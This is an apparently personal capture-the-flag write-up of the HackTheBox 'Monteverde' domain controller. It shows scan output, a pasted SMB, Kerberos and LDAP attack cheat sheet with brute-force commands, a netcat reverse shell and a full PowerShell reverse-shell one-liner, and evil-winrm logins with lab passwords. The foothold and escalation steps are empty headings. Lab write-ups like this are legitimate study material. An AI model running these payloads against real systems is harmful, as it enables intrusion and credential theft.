Monteverde

Windows · Medium

10.10.10.172

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.172

53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-21 02:48:06Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time: 
|   date: 2024-01-21T02:48:21
|_  start_date: N/A

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.172

88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.172 

53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-21 02:53:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
49796/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -1s
| smb2-time: 
|   date: 2024-01-21T02:54:12
|_  start_date: N/A

These are all typical Windows looking ports. Seeing TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests this might be a domain controller.

Enumeration: SMB Port 139/445/tcp

Doesn’t look like I can connect to anything on SMB without creds:

┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.10.172
===========( Password Policy Information for 10.10.10.172 )=============                                                                                                                                                                                       
[+] Attaching to 10.10.10.172 using a NULL share
[+] Trying protocol 139/SMB...
        [!] Protocol failed: Cannot request session (Called Name:10.10.10.172)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
        [+] MEGABANK
        [+] Builtin
[+] Password Info for Domain: MEGABANK
        [+] Minimum password length: 7
        [+] Password history length: 24
        [+] Maximum password age: 41 days 23 hours 53 minutes 
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: 1 day 4 minutes 
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:                                             
Password Complexity: Disabled                                                                    
Minimum Password Length: 7


[+]  Getting local group memberships:                                                            
Group: ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs                                
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs

[+]  Getting domain groups:                                                                      
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]                                      
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

[+]  Getting domain group memberships:                                                           
Group: 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator               
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group: 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group: 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group: 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group: 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group: 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group: 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group: 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group: 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group: 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group: 'Trading' (RID: 2610) has member: MEGABANK\dgalanos

smbmap -H 10.10.10.239

smbmap -H 10.10.10.239 -u null


smbclient -L //10.10.10.239 -N


crackmapexec smb 10.10.10.239 -u '' -p '' --shares

crackmapexec smb 10.10.10.239 --shares


nmap --script smb-vuln* -p139,445 -T4 -Pn 10.10.10.239

Enum hostname

enum4linux -n 10.11.1.111
nmblookup -A 10.11.1.111
nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111

Get Version

smbver.sh 10.11.1.111
Msfconsole;use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\10.11.1.111

Get Shares

smbmap -H  10.11.1.111 -R <sharename>
sudo smbmap -H 10.11.1.136 -R --download "Bob Share\Draft Contract Mr. Yamamoto.txt" # Connect to a share with a space & download files
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\<share>
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\

Check null sessions

smbmap -H 10.11.1.111
rpcclient -U "" -N 10.11.1.111
smbclient //10.11.1.111/IPC$ -N

Exploit null sessions

enum -s 10.11.1.111
enum -U 10.11.1.111
enum -P 10.11.1.111
enum4linux -a 10.11.1.111
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

Connect to username shares

smbclient //10.11.1.111/share -U username

Connect with a user and password

smbclient -U "fox%iparalipomenidellabatracomiomachia"  //192.168.123.157/

Connect to share anonymously

smbclient \\\\10.11.1.111\\<share>
smbclient //10.11.1.111/<share>
smbclient //10.11.1.111/<share\ name>
smbclient //10.11.1.111/<""share name"">
rpcclient -U " " 10.11.1.111
rpcclient -U " " -N 10.11.1.111

Check vulns

nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111

Check common security concerns

msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc

Extra validation

msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc

Multi exploits

msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run

Bruteforce login

medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv nmap –script smb-brute 10.11.1.111

nmap smb enum & vuln

nmap --script smb-enum-,smb-vuln-,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111

Mount smb volume linux

mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

rpcclient commands

rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall

Run cmd over smb from linux

winexe -U username //10.11.1.111 "cmd.exe" --system

#smb reverse shell with "logon" cmd logon "/=nc 10.10.14.5 4444 -e /bin/bash"

smbmap

smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum smbmap.py -u username -p 'P@w0rd1234!' -L # Drive Listing smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

Check

\Policies{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

Enumeration: MSRPC Port 135/tcp RPC - TCP 445

I am able to get a RPC session without creds:

nmap 10.11.1.111 --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom

Enumeration: kerberos Port 88/tcp

Microsoft Windows Kerberos (server time: 2024-01-21 02:53:18Z)

MS14-068
GetUserSPNs

GET USERS:

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
use auxiliary/gather/kerberos_enumusers

Kerberos (I): ¿Cómo funciona Kerberos? - TeoríaTarlogic Security

Kerberos (II): ¿Como atacar Kerberos?Tarlogic Security

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

Extracting Service Account Passwords with Kerberoastingblog.stealthbits.com

Enumeration: LDAP - TCP 389

ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'
patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'

Shell as mhope

Credential Brute Force:

SMB with Creds - TCP 445:

WinRM:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' 

*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/20/2024   6:41 PM             34 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
ef6be1c9b8ba7------------------

*Evil-WinRM* PS C:\Users\mhope\Desktop> whoami
megabank\mhope

Priv: mhope –> administrator

Enumeration:

Exploit:

WinRM:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/20/2024   6:41 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
ca4c87ac920fc1253e-----------------

PreviousLove NextFuse

Last updated 2 years ago

hashtag Reconnaissance: NMAP

hashtag Enumeration: SMB Port 139/445/tcp

hashtag Enumeration: MSRPC Port 135/tcp RPC - TCP 445

hashtag Enumeration: kerberos Port 88/tcp

hashtag Enumeration: LDAP - TCP 389

hashtag Shell as mhope

hashtag Priv: mhope –> administrator